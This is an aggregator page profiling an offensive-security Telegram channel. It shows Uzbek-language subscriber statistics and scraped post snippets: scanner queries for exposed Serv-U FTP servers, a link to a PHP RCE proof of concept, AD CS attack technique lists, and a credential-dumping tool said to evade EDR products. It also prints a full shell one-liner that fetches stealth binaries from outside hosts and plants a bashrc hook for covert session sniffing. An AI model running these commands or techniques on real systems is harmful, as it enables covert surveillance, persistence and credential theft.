APT
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat
Ko'proq ko'rsatish📈 Telegram kanali APT analitikasi
APT (@apt_notes) Ingliz til segmentidagi kanali faol ishtirokchi. Hozirda hamjamiyat 16 236 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 7 782-o'rinni va Rossiya mintaqasida 40 429-o'rinni egallagan.
📊 Auditoriya ko‘rsatkichlari va dinamika
невідомо sanasidan buyon loyiha tez o‘sib, 16 236 obunachiga ega bo‘ldi.
29 Avgust, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 560 ga, so‘nggi 24 soatda esa 13 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.
- Tasdiqlash holati: Tasdiqlanmagan
- Jalb etish (ER): Auditoriya o‘rtacha 39.15% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 18.08% ini tashkil etuvchi reaksiyalarni to‘playdi.
- Post qamrovi: Har bir post o‘rtacha 6 354 marta ko‘riladi; birinchi sutkada odatda 2 934 ta ko‘rish yig‘iladi.
- Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 26 ta reaksiya keladi.
📝 Tavsif va kontent siyosati
Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“This channel discusses:
— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc
Disclaimer:
t.me/APT_Notes/6
Chat Link:
t.me/APT_Notes_PublicChat”
Yuqori yangilanish chastotasi (oxirgi ma’lumot 30 Avgust, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.
Hunter: protocol.banner="Serv-U FTP" FOFA: app="SolarWinds-Serv-U-FTP" SHODAN: product:"Serv-U ftpd"
on Windows PHP 8.3 < 8.3.8 PHP 8.2 < 8.2.20 PHP 8.1 < 8.1.29PoC: https://github.com/watchtowrlabs/CVE-2024-4577 Blog: blog1 & blog2 #exploit #rce
• ESC 1 (Template misconfiguration) • ESC 2 (Template misconfiguration) • ESC 3 (Template misconfiguration) • ESC 4 (Access Controls Attacks) • ESC 5 (Sufficient rights against several objects) • ESC 6 (CA Configuration) • ESC 7 (Sufficient rights against the CA) • ESC8 • ESC9 • ESC10 • ESC11 • ESC12 • ESC13Domain Persistence:
• DPERSIST1 (Forge certificates with stolen CA certificate) • DPERSIST2 • DPERSIST3 Account Persistence: • PERSIST1 (User Account) • PERSIST2 (Machine account) • PERSIST3Domain Certificate Theft:
• THEFT1 (Export user certificates with Crypto APIs) • THEFT2 (Certificate theft via DPAPI): User certificates THEFT, Machine certificates Theft • THEFT3 • THEFT4 • THEFT5
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keyloggerHistorically was able to (and may presently still) bypass: * Windows Defender * Malwarebytes Anti-Malware * CrowdStrike Falcon EDR (Falcon Complete + OverWatch)Tool: https://github.com/Meowmycks/LetMeowIn?tab=readme-ov-file Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b #redteam #pentest #creds #dump
